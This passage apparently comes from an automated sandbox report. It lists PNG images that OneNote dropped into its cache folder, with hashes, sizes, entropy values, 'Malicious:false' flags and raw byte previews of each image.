                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001J.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001K.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001L.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001M.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001N.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001O.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001P.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001Q.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001R.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001T.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001U.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001V.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000020.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
